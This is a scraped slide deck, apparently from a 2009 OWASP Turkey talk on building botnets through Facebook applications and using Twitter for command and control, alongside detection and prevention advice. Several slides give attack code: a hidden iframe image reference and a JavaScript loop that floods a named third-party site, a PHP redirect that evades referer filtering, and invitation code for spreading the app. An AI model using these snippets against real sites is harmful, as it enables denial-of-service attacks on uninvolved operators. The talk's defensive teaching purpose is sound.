330 likes | 490 Vues
Facebook, Twitter and Botnets. OWASP Turkey Chapter September 26 2009 Istanbul. Botnet . C ollection of software robots , or bots , that run autonomously and automatically Botnet in its simplest form is an army of compromised computers that take orders from a botherder
E N D
Facebook, Twitter and Botnets OWASP Turkey Chapter September 26 2009 Istanbul
Botnet • Collection of software robots, or bots, that run autonomously and automatically • Botnet in its simplest form is an army of compromised computers that take orders from a botherder • Botnets are arguably the biggest threat that the Internet community has faced • Most popular Botnet Type: “IRC Channels based Botnets” • Lately Social Networking Sites based Botnets
Puppetnet • Puppetnets rely on websites that coerce web browsers toparticipate in Malicious activities • Such activities include • distributed denial-of-service • worm propagation • reconnaissance probing • Puppetnets exploit the high degree of flexibility granted to the mechanisms comprising the web architecture • A website under the control of an attacker can thereby transform a collection of web browsers into adistributed system that is effectively controlled by the attacker • Puppetnets can instruct any web browser to engage in malicious activities
Puppetnet • Participation in puppetnets is dynamic • Users join and participate unknowingly while surfing the net • Easy to maintain a reasonable population, withoutthe burden of having to look for new victims • Harder for the defenders to track and filter out attacks, as puppets arelikely to be relatively short-lived • Onlyindirectly misuse browsers to attack third parties • http://www.ics.forth.gr/dcs/Activities/papers/TISSEC.puppetnets.2007.pdf
Puppetnet Diagram Zararli Web Sunucusu Atakkomutlarinidaiceren HTTP istekvecevaplari AtakTrafigi Kurban Site Web Istemcileri
What can be done via Puppetnets • Image Reference • Loading image objects through Javascript • Open up pop-up Windows • Creation of Frames to load remote objects * No browser that imposes restrictions on the location or type of the target referenced through these mechanisms
Puppetnet DDoS • What is more important? • Size of Puppetnet ? • Sufficient Firepower for a typical DDoS scenario? • Determine how much “traffic” a browser can typically generate under the attacker’s command • Number of users concurrently viewing the malicious page on their web browser • Amount of bandwidth each of these users can generate towards the target server Firepower of DDoS Attack = *
Facebook • Facebook is a global social networking website that is operated and privately owned by Facebook, Inc. • Users can • add friends • send them messages • update their personal profiles to notify friends about themselves • join networks organized by city, workplace, school, and region
Application Development in Facebook • Options while creating FaceBook applications • Option1: Port an existing application to FaceBook by using iframe • Option2: Develop an application by using FBML, FBJS, FQL and FB API • Create an application in FaceBook • FaceBook API • Facebook Markup Language(FBML) • Facebook Query Language(FQL) • FacebookJavascript(FBJS)
Facebook Application (How does it work?) • Callback metaphor to interact with applications • The URL of the application associated with a registered application in Facebook • When the Facebook application URL requested, Facebook redirects the request to the server • The application processes the request, communicates with Facebook using the Facebook Application Programming Interface (API) or Facebook Query Language (FQL) • Returns Facebook Markup Language (FBML) to Facebook for presentation
Facebook Dynamics • FaceBook API • Web services programming interface for accessing core services • profile • friends • group • event • photo • Performsother Facebook-centric functionality • log in • redirect • update view • Facebook Markup Language (FBML) • HTML-like language • Display pages inside of the Facebook canvas
Facebook Dynamics • Facebook Query Language (FQL) • SQL-based interface into Facebook data. • Similar to standard SQL • Access many Facebook database tables • user • friend • group • group_member • event • event_member • photo • album • photo_tag • Restrictions • SELECT statements must be performed one table at a time • Join queries are not permitted • Queries must be indexable.
Facebook Dynamics • FacebookJavascript (FBJS) • Allows limited scripting functionality • Alternative DOM implementation • Similar to Standard JavaScript • Differs from standard JavaScript • While accessing a JavaScript property (such as document.href), FBJS uses a pair of get and set methods instead (getHref, setHref) • While processingscripting code inside of script elements, tacks on the application ID to function and variable names • Prevents the ability to run any javascript code you want • FBJS transformed on the fly into JavaScript as the page is loaded • All variables and functions are prepended with a string like "xyz3455679_“ • Restriction on what can be done with DOM elements • Avoids cross-site-scripting attacks and hostile user behavior
Facebook Platform • Standards-based programming framework • Enables developers to create applications that interact and integrate with core Facebook services • Facebook applications are not installed directly onto the Facebook server. Instead, they are placed on the developer’s server • Facebook applications are called by Facebook when the application URL is requested
Facebook Application Diagram (How does it work?) 1. Facebook Sunucusu uygulama icin bir URL istegi aliyor (apps.facebook.com/uygulama) 2. Facebook Uygulamanin oldugu Sunucudaki Callback URL yi cagiriyor 3. Uygulama istegi degerlendiriyor, Facebook bilgisini API ya da FQL vasitasi ile Facebook’dan aliyor ve FBML araciligi ile kullanicinin gormesi icin FBML araciligi ile Facebook’a geri gonderiyor. 4. Facebook FBML cevabini aliyor ve cevabi Facebook Canvas icerisinde gosteriyor ve HTML yi istegi baslatan tarayiciya gonderiyor.
What kind of a Facebook Application? • A simple application? • A popular application? • Game or Utility? • Fan based Program? • Continuous Usage? • A program that creates Programs? • TOS?
Facebook-TOS • http://www.facebook.com/terms.php • Privacy • Sharing Your Content and Information • Safety • Registration and Account Security • Protecting Other People's Rights • Mobile • Payments • Special Provisions Applicable to Share Links • Special Provisions Applicable to Developers/Operators of Applications and Websites • About Advertisements on Facebook • Special Provisions Applicable to Advertisers • Special Provisions Applicable to Pages
Facebook - TOS - Safety • Safety • You will not upload viruses or other malicious code. • You will not collect users' content or information, or otherwise access Facebook, using automated means (such as harvesting bots, robots, spiders, or scrapers) without our permission. • You will not use Facebook to do anything unlawful, misleading, malicious, or discriminatory. • You will not do anything that could disable, overburden, or impair the proper working of Facebook, such as a denial of service attack.
Facebook - TOS - Provisions Applicable to Developers • Special Provisions Applicable to Developers/Operators of Applications and Websites • You will only request data you need to operate your application. • You will not use, display, or share a user's data in a manner inconsistent with the user's privacy settings. • You will delete all data you received from Facebook if we disable your application or ask you to do so.
Botnet Creation in Facebook • Image Reference • Inline linking • Use of a linked object (usually an image) • Using it from one site into a web page belonging to a second site • The second site is said to have an inline link to the site where the object is located • When a web site is visited • Browser first downloads the textual content in the form of an HTML document • The downloaded HTML document may call for other HTML files to be processed • It also permits absolute URLs that refer to images hosted on other servers (<imgsrc="http://www.example.com/picture.jpg" />) • When a browser downloads an HTML page containing such an image, the browser will contact the remote server to request the image content
Botnet Creation in Facebook • Image Reference • A single line like • echo "<fb:iframeframeborder=\"0\" width:0px height:0px src=\"http://www.w3schools.com/js/venus.jpg\" />"; • Good enough to create a DDOS Attack to the src Victim Site being w3schools.com in the above example • An iframe which downloads an image with a width and height set to 0px • Browser fetches the page above and does not show it • Change width and height and see the picture
Botnet Creation in Facebook • How to Create a large number of requests to the target site ? • Embed a sequence of image references in the malicious webpage, which can be done using either a sequence of IMG SRC instructions • JavaScript loop that instructs the browser to load objects from the target server • Loading image objects through Javascript <SCRIPT> pic= new Image(10,10); function DDOS() { var now = new Date(); pic.src='http://www.w3schools.com/js?'+now.getTime(); setTimeout ( "DDOS()", 10 ); return; } </SCRIPT> <IFRAME name='parent' width="0%" src="page.htm" onLoad="DDOS()"> </IFRAME>
Propagation of Facebook Botnet • Create an Application • Make it nice and fun !(Really important) • Advertise it by using Facebook features: • News Feed • Invitation(Limit 20 a day) $invite_text = htmlentities($invite_text); echo "<fb:request-form type='Kim Silmis' content='$invite_text' action='index.php' method='POST' invite='true' >"; echo "<fb:multi-friend-selector showborder='true' max ='20' actiontext='Kim Silmişprogramıilesiziarkadaşlistesindensilenlerigörmekistermisiniz?' exclude_ids='$exclude_list' >"; echo "</fb:request-form>"; • Notification $facebook->api_client->notifications_send($friends[1], 'Kim silmiskullaniyor. Siz de <a href="http://apps.facebooks.com/kilsilmis">Kim silmis</a> kullanarakzevklezamangeçirebilirsiniz. ');
Detection of Facebook Botnet • Victim host must filter out all incoming traffic introduced by Facebook users. • Use the referer field of the HTTP requests • Determine whether a request originates from facebook.com or not • Stop the attack traffic accordingly • Possible for a Facebook application developer to overcome this situation src=http://attack-host/dummy-page?ref=victim-host/image1.jpg <?php if ($_GET["ref"]) { $ref=$_GET["ref"]; } print("<meta http-equiv=’refresh’ content=’0; url=$ref’>"); ?>
Prevention of Facebook Botnet • Social network providers should be careful with the use of client side technologies, like JavaScript, etc. • Social network operator should provide developers with a strict API, which is capable of giving access to resources only related to the system. • Applications should run in an isolated environment imposing constraints to prevent the application from interacting with other Internet hosts • Facebook Platform can cancel the use of fb:iframe tag, as this tag is used to load images hosted at the victim host.
Facebook PoC Facebot • www.ics.forth.gr/dcs/Activities/papers/facebot.isc08.pdf
Twitter • Free social networking and micro-blogging service • Enables users to send and read messages known as tweets • Tweets are text-based posts of up to 140 characters displayed on the author's profile page and delivered to the author's followers • Senders can restrict delivery to those in their circle of friends or allow open access
Twitter • Profile(Name, Location, Bio) • Find People(Twitter, Other Networks, Emails, Suggested Users) • @ • RT • Direct Message • # • http://search.twitter.com • Favorites • RSS
Twitter Botnet? • Reasons • Ability to hide random commands in the large amount of data that is generated each day • A really good API that would make integration easy • Ideas • Option1: A protected twitter account that only the bots could read. • Restriction on who could see the commands ? • Easy for Twitter to block the user • PoC supposedly exists • Option2: Send Commands to random accounts and then have the Bot use the search feature to find the commands. • Harder for Twitter to block the messages as the commands could be posted from any account to any other account. • Bot would have to have a way to spot the commands in the general mess of other tweets out there. • If the bot can spot the commands then Twitter could also do the same matching and automatically drop those tweets. • Use seemingly innocent commands, such as "check out this link ..." instead of saying download a file • Innocent commands would be hard for Twitter to block without upsetting legitimate users • Additional Suggestions • Using TinyURL to obfuscate commands • Using hash tags to represent certain things • Making bots to follow certain accounts to mark themselves as bots.
Twitter - POC • Proof of Concept bot which uses Twitter as its Command and Control channel at http://www.digininja.org/projects/kreiosc2.php • Waiting for Defcon 2009 Video Presented by Kevin Johnson and Tom Eston
Tesekkurler • Ibrahim HalilSaruhan Facebook : halilsaru@gmail.com E-Mail : ibrahimsaruhan@gmail.com
Sorular ?